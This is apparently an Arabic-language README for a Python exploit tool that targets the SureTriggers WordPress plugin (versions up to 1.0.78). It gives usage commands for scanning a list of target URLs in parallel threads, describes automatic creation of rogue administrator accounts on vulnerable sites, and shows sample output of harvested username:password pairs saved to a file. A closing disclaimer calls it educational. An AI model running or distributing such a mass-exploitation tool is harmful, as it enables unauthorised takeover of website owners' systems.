
🛠️ سكربت استغلال SureTriggers يُستخدم هذا السكربت لتحديد واستغلال الثغرات الأمنية في إضافة SureTriggers على مواقع WordPress التي تستخدم إصدارًا معرضًا للثغرة (≤ v1.0.78). إذا نجح الاستغلال، سيقوم السكربت تلقائيًا بإنشاء حساب مدير (admin) في WordPress.
⚙️ الميزات
🚀 طريقة الاستخدام 📦 التحضير ثبّت التبعيات (إذا لم تكن مثبتة):
Copy
Edit
pip install requests
جهّز ملفًا يحتوي على قائمة عناوين URL المستهدفة (واحد في كل سطر)، على سبيل المثال targets.txt:
Copy
Edit
http://example1.com
https://example2.net
...
🧪 التنفيذ
Copy
Edit
python exploit.py -l targets.txt -t 10
🔧 خيارات CLI
الخيار الوصف -l, --target_urls ملف نصي يحتوي على قائمة الأهداف -t, --threads عدد الخيوط (الافتراضي: 5)
✅ مثال على المخرجات
Copy
Edit
[+] http://example.com - Vulnerable v1.0.75 detected.
[+] http://example.com - Exploit successful! username:password
[+] http://example.com/wp-login.php | username:password (saved)
📝 ملاحظات لا يتم استغلال الهدف إلا إذا:
تم العثور على إضافة SureTriggers
كان إصدار الإضافة ≤ 1.0.78
كانت صفحة wp-login.php صالحة
سيحتوي ملف vulnerable.txt على الحسابات التي تم إنشاؤها بنجاح بالتنسيق التالي:
Copy
Edit
http://target.com/wp-login.php | username:password
⚠️ إخلاء مسؤولية صُنع هذا السكربت لأغراض تعليمية واختبارات أمان مشروعة. يُمنع منعًا باتًا استخدامه في أنشطة تخالف القانون أو دون إذن من مالكي النظام. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذا السكربت.